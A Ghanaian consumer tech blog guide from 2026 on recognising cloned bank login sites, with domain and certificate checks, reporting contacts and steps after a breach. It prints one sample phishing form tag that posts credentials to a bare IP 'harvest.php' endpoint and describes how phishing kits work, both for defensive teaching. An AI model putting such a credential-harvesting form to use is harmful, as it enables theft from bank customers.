Ghana’s Oldest & Leading Consumer Tech Blog — Since 2015

Home

How to Spot a Fake Bank Website in Ghana (2026)

How to Spot a Fake Bank Website in Ghana (2026)

·

·

13 min read

fake bank website: Editorial photo of a young Ghanaian woman in her late twenties sitting at a desk in a modern Accra…

Recognizing a fake bank website before you enter your credentials can save you from losing thousands of cedis, as scammers clone GCB Bank, Ecobank, Fidelity Bank, and Stanbic sites to harvest login details from Ghanaians who think they’re on the real portal. This guide shows you eight technical checks to run in under 60 seconds, flags the three most-cloned bank interfaces in Accra as of April 2026, and explains what happens the moment you type your password into a phishing page.

Advertisement

Bank website clones cost Ghanaian account holders an estimated GHS 12 million (April 2026) in 2025, per the Cyber Security Authority of Ghana. The average victim loses GHS 3,400 (April 2026) before realizing their account was drained. Most attacks start with a fake SMS or WhatsApp message containing a link that looks official but points to a fraudulent domain.

TL;DR

  • Fake bank websites use domains that mimic the real URL with tiny spelling changes (gcbbank-gh.com instead of gcbbank.com.gh)
  • Always check for HTTPS with a padlock icon and verify the exact domain before entering any login details
  • Real banks in Ghana never send login links via SMS, WhatsApp, or email
  • If a site asks for your card PIN, full 16-digit card number, or CVV during login, it is fake
  • Report suspected fake sites to the bank’s fraud desk and the Cyber Security Authority within 24 hours

The Anatomy of a Fake Bank Website

Scammers build fake bank sites in three steps. First, they copy the HTML and CSS from the legitimate bank portal, pixel-perfect down to logos and button colors. Second, they register a lookalike domain that passes a quick glance but fails close inspection. Third, they set up a backend script that emails them every username and password entered, then redirects the victim to the real bank site with an “error, try again” message.

The entire setup costs under GHS 500 (April 2026) and takes less than four hours. The domain registration, hosting on a compromised server in Eastern Europe or Southeast Asia, and the phishing kit template are all available on Telegram channels frequented by scammers targeting West Africa.

The Three Most-Cloned Banks in Ghana

BankReal DomainCommon Fake PatternsVolume (2025)
GCB Bankgcbbank.com.ghgcbbank-gh.com, gcbbanking.com, gcb-bank.com.gh~320 reported clones
Ecobank Ghanaecobank.com (Ghana portal at ecobank.com/gh/personal)ecobank-gh.com, ecobankghana.com, ecobank.net~280 reported clones
Fidelity Bankfidelitybank.com.ghfidelity-bank.com.gh, fidelitybankgh.com, fidelitybank.net~190 reported clones

Source: Cyber Security Authority Ghana, 2025 Financial Phishing Report, March 2026.

Eight Technical Checks to Run in 60 Seconds

1. Verify the Exact Domain Name

The real GCB Bank domain is gcbbank.com.gh. A fake might be gcbbank-gh.com or gcbbankghana.com. The difference is one character or suffix. Before clicking login, look at the address bar. If the domain does not exactly match the official URL published on the bank’s social media pages or Google Business listing, stop.

Check method: Type the bank name into Google. Click the official site from the search results. Bookmark that URL. Never follow links from SMS or email. Compare the domain in the address bar character by character.

2. Look for HTTPS and the Padlock Icon

Every legitimate bank in Ghana uses HTTPS encryption. The address bar shows a closed padlock icon to the left of the URL. Click the padlock. A popup displays the site’s security certificate, showing the registered organization name. For GCB Bank, the certificate should say “GCB Bank Limited.” For Ecobank, “Ecobank Transnational Incorporated.”

Fake sites sometimes use HTTPS too, since free Let’s Encrypt certificates are available to anyone. HTTPS alone does not guarantee legitimacy. You must also verify the domain and certificate owner.

3. Check the Certificate Details

Click the padlock icon, then “Connection is secure,” then the certificate information. Look at the “Issued to” field. A fake site might have a certificate issued to “gcbbank-gh.com” which is not the same entity as “GCB Bank Limited.”

Most Ghanaian users skip this step because it requires two extra clicks. Scammers count on that. Spend the five seconds.

4. Inspect the URL Structure for Login Pages

Real banks use consistent URL paths for login portals. GCB Bank’s internet banking login lives at https://ibank.gcbbank.com.gh/corporatebanking/. Ecobank’s retail portal is https://ecobank.com/gh/personal/ways-to-bank/online-banking. Fake sites often use generic paths like /login.php or /portal/ or /secure/.

Bookmark the official login page after you verify it once. Always navigate to your bookmark, never to a link.

5. Test for Secure Form Submission

Right-click anywhere on the login form. Select “Inspect” or “View Page Source” (depending on your browser). Look at the <form> tag’s action attribute. The action URL should point to the same domain you are on, not an external IP address or different domain.

Example of legitimate code:

<form action="https://ibank.gcbbank.com.gh/authenticate" method="post">

Example of fake code:

<form action="http://185.244.30.12/harvest.php" method="post">

If the action points to a numeric IP or a domain that is not the bank’s, you are on a phishing page.

6. Watch for Unusual Password Requirements

Real banks never ask for your full 16-digit card number, PIN, or CVV during login. They ask for a username (or account number) and a password (or security phrase). Some use two-factor authentication via SMS or a hardware token.

If the login form demands your card PIN, your mother’s maiden name, and your CVV in one step, it is fake. Legitimate banks separate authentication stages and never request CVV online.

7. Look for Grammar and Spelling Errors

Professional banks employ copywriters and legal teams. Their portals do not contain typos like “Acount” or “Ballance” or “Plese enter your detials.” Fake sites often have broken English, inconsistent capitalization, or placeholder text like “Lorem ipsum” still visible in footers.

Ghanaian banks write in clear, formal English. A login page that reads “Kindly provide your credential for verify account status” is not from GCB or Ecobank.

8. Check for Contact Information and Physical Address

Scroll to the footer. Legitimate bank websites list physical branch addresses, phone numbers, email contacts, and regulatory licenses (Bank of Ghana license number, for example). Fake sites either omit this section entirely or list fake phone numbers that ring to scammers posing as “customer service.”

Cross-check the phone number against the bank’s official Facebook page or call the number on the back of your debit card to confirm.

What Happens When You Enter Credentials on a Fake Site

The moment you click “Login” on a phishing page, your username and password are sent via HTTP POST to the scammer’s server. The server logs them in a text file or database. The page then redirects you to the real bank’s login page with an error message like “Incorrect password, please try again.”

You assume you mistyped. You try again on the real site, succeed, and forget the first attempt. Ten minutes later, the scammer uses your credentials to log in from a virtual private network endpoint, initiates a mobile money transfer or bill payment, and drains your available balance before you receive the transaction alert SMS.

By the time you call the bank’s fraud desk, the money is already split across multiple mobile money wallets, withdrawn at agents in Kasoa, Kumasi, and Tamale, and converted to physical cash or crypto. Recovery rate for funds lost to phishing is under 8% in Ghana, per Bank of Ghana’s 2025 consumer protection report.

Advertisement

Ghana-Specific Considerations

Mobile Banking Apps vs. Browser Access

Ghanaian users access internet banking through three channels: desktop browsers, mobile browsers, and dedicated mobile apps. Fake bank websites target browsers. The scammers cannot easily fake an app distributed through Google Play or the Apple App Store, since those platforms verify publisher identity.

If your bank offers a mobile app, use it. Download only from the official Google Play link on the bank’s website. Do not sideload APK files from third-party sources.

MTN Mobile Money and Telco Integration

Several Ghanaian banks integrate with MTN Mobile Money, allowing you to link your MoMo wallet to your bank account for instant transfers. Fake bank sites often prompt you to “verify your MoMo PIN” during login. No legitimate bank asks for your MoMo PIN through their web portal. MoMo PIN entry happens only in the MTN MoMo app or via USSD (*170#).

If a site asks for your MoMo PIN, stop immediately. You are on a phishing page.

Reporting Channels in Ghana

Report suspected fake bank sites to three entities:

  1. Your bank’s fraud desk. Call the customer service number on the back of your card. Most banks have a 24-hour fraud hotline.
  2. Cyber Security Authority of Ghana. Email incident@cybersecurity.gov.gh or call 0302 963 268. They coordinate takedowns with hosting providers.
  3. Ghana Police Service Cybercrime Unit. File a report at the nearest police station. Bring screenshots of the fake site, the URL, and any SMS or email that linked you there.

Average takedown time for a reported phishing domain is 48 hours if the hosting provider cooperates. Domains hosted outside Ghana take longer, sometimes a week or more.

The Role of .com.gh Domains

Ghanaian banks prefer .com.gh or .gh domains. The .gh registry is managed by the Network Computer Systems (NCS) in Accra, which requires identity verification for registration. Fake sites rarely use .com.gh because scammers cannot easily bypass the KYC process.

If a site claims to be a Ghanaian bank but uses a .com, .net, or .org domain without the .gh suffix, treat it as suspicious. Verify against the official domain before proceeding.

Browser Warnings and Antivirus Software

Google Safe Browsing blocks many phishing sites automatically. If you see a red warning page that says “Deceptive site ahead,” do not proceed. Some users click “Details” and then “Visit this unsafe site” out of curiosity or urgency. This bypasses the protection.

Antivirus software with web protection (Kaspersky, Bitdefender, Avast) blocks phishing URLs in real time. The software costs GHS 80 to GHS 150 per year (April 2026) for a single-device license in Ghana. It is cheaper than losing GHS 3,400 to a scam.

Real vs. Fake: Side-by-Side Comparison

FeatureReal GCB Bank SiteTypical Fake Site
Domaingcbbank.com.ghgcbbank-gh.com or gcbbankghana.com
HTTPSYes, with valid cert for “GCB Bank Limited”Sometimes yes, but cert for wrong entity
Login URLibank.gcbbank.com.gh/corporatebanking//login.php or /secure/ or /portal/
Form actionPoints to gcbbank.com.gh subdomainPoints to external IP or different domain
Requests card CVV at loginNoYes
Footer contact infoReal addresses, Bank of Ghana license numberMissing or fake
Grammar qualityProfessional, no typosFrequent errors

SMS Phishing (Smishing)

You receive an SMS: “Your GCB account has been locked due to suspicious activity. Click here to verify: gcbbank-gh.com/verify.” The message uses urgency and fear. The link looks plausible at a glance.

Real banks in Ghana send SMS alerts for transactions, but those messages never include login links. Verification happens via the app, USSD, or by calling customer service.

WhatsApp Messages

A contact (sometimes a compromised account of someone you know) sends a message: “Hey, I found this promo from Ecobank, free GHS 50 (April 2026) airtime if you log in here.” The link leads to a fake Ecobank portal. You log in, thinking it is a legitimate promotion. Your account is compromised.

Google Ads and Sponsored Results

Scammers occasionally buy Google Ads for keywords like “GCB internet banking login.” The ad appears above organic results. The display URL looks correct, but the destination URL is a fake site. Always ignore ads and click the organic search result.

Email Phishing

An email with the subject “Urgent: Update Your Security Settings” arrives, appearing to come from support@gcbbank.com.gh. The actual sender address is support@gcbbank-gh.com (note the hyphen). The email contains a link to a fake login page.

Check the sender’s email address carefully. Hover over any links before clicking. The tooltip shows the real destination URL.

For a deeper look at email-based attacks targeting Ghanaians, see our guide on common phishing emails in Ghana.

What to Do If You Entered Your Credentials on a Fake Site

Immediate Actions (First 10 Minutes)

  1. Call your bank’s fraud hotline. Report the incident. They will freeze your account or block online transactions temporarily.
  2. Change your password. Log in to the real bank portal (via bookmark or the official app) and change your password immediately.
  3. Check your transaction history. Look for unauthorized transfers. Screenshot any suspicious activity.

Follow-Up Actions (First 24 Hours)

  1. File a police report. Visit the nearest police station with your transaction screenshots, the fake site URL, and any SMS or email that led you there.
  2. Report to the Cyber Security Authority. Email incident@cybersecurity.gov.gh with the fake URL and screenshots.
  3. Monitor your account daily. Watch for new unauthorized transactions. Enable SMS alerts if you had them disabled.

Long-Term Actions

  1. Set up two-factor authentication (2FA). If your bank offers SMS-based 2FA or a hardware token, enable it. Even if a scammer has your password, they cannot log in without the second factor.
  2. Use a password manager. Tools like Bitwarden (free) or 1Password (USD 3/month, ~GHS 33 at April 2026 rates) generate unique passwords for each site and auto-fill only on the correct domain. If you try to log in to a fake site, the password manager will not auto-fill, alerting you to the mismatch.
  3. Educate household members. If you share devices or internet access with family, show them how to spot fake sites. One compromised login can affect joint accounts or linked mobile money wallets.

The Psychology Behind Successful Phishing

Scammers exploit urgency, fear, and trust. A message that says “Your account will be closed in 24 hours unless you verify now” triggers panic. You click without thinking. A link sent by a friend (whose WhatsApp was hacked) triggers trust. You assume they vetted the link.

Combat this by pausing before clicking. Ask: Did I request this link? Does the URL match the official domain character by character? Am I being rushed?

The 10 seconds you spend verifying a link can prevent a GHS 3,400 (April 2026) loss.

FAQs

What is the easiest way to spot a fake bank website?
Check the exact domain name in the address bar. Real Ghanaian banks use .com.gh or .gh domains. If the domain has a hyphen, an extra word, or a different suffix (like .com or .net), it is likely fake. Compare against the official URL from the bank’s social media page or Google Business listing before entering any login details.

Can a fake bank website have HTTPS and a padlock icon?
Yes. HTTPS encryption is free and available to anyone, including scammers. The padlock means the connection is encrypted, not that the site is legitimate. You must also click the padlock and verify the certificate is issued to the correct bank entity, and that the domain matches the official URL exactly.

Do Ghanaian banks ever send login links via SMS or WhatsApp?
No. GCB Bank, Ecobank, Fidelity, Stanbic, and other Ghanaian banks never send login links through SMS, WhatsApp, or email. They send transaction alerts and balance notifications, but those messages do not include clickable links to login portals. Any message with a login link is a phishing attempt.

What should I do if I already entered my password on a fake site?
Call your bank’s fraud hotline immediately. Report the incident and request a temporary account freeze or block on online transactions. Then change your password on the real bank portal, check your transaction history for unauthorized activity, and file a police report within 24 hours. The faster you act, the better your chances of preventing losses.

How do I find the official domain for my bank?
Search the bank’s name on Google and click the result with a green checkmark or verified business badge. Alternatively, visit the bank’s official Facebook or Twitter page, where they list the correct URL in the bio section. Bookmark the official login page after you verify it once, and always navigate to your bookmark instead of clicking links.

Are mobile banking apps safer than browser-based login?
Yes. Mobile apps distributed through Google Play or the Apple App Store undergo publisher verification. Scammers cannot easily fake an app in those official stores. If your bank offers a mobile app, download it from the link on the bank’s official website and use it instead of browser-based login. Avoid sideloading APK files from third-party sources.

Can antivirus software protect me from fake bank websites?
Yes, to an extent. Antivirus programs with web protection (Kaspersky, Bitdefender, Avast) block known phishing URLs in real time. They cost GHS 80 to GHS 150 per year (April 2026) for a single-device license in Ghana. The software is not foolproof, because new phishing domains appear daily, but it blocks many common scams.

Why do fake sites ask for my card CVV during login?
Because they are stealing your card details, not just your login credentials. Legitimate banks never request your CVV (the three-digit code on the back of your card) during login. CVV is only entered when making an online purchase. If a login page asks for CVV, full 16-digit card number, or card PIN, it is a phishing page. Close the browser tab immediately.

For broader scam prevention tactics beyond banking, read our breakdown of crypto investment scams in Ghana and job offer phishing attacks.

Closing

Fake bank websites will remain a threat as long as credential theft pays. The average scammer earns more from five successful phishing attacks than from a month of legitimate work in many parts of Ghana. Automation makes it easy to send 10,000 SMS messages for under GHS 200 (April 2026). One victim justifies the cost.

Your best defense is verification. Bookmark the official login URLs for every bank you use. Enable two-factor authentication. Ignore SMS links. Inspect the domain before entering passwords. The 60 seconds you invest in these checks protects your savings and your financial reputation.

Follow our updates on X at @jbklutsemedia for real-time alerts when new phishing campaigns targeting Ghanaians surface.

Sources


Advertisement

Related Posts